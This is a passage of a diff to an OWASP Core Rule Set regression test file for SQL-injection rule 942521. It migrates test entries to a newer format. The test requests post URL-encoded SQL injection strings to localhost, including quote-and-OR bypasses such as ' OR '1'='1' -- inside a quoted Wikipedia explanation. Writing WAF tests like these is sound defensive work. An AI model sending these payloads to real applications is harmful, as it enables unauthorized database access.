text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 14 desc: "Bypass with '''or 1" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='''or%201" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='''or%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 15 desc: "False-negative: Not detected with escapes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'lol'%20or%20'1" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
+ method: POST + port: 80 + uri: "/post" + data: "var=%5C'lol'%20or%20'1" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 16 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20i
nstead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F
*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20sam
e%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 17 desc: "Performance test" stages: - - stage: 
- input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%
60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%4
0%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%
21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40
%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 
"var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60
%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40
%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21
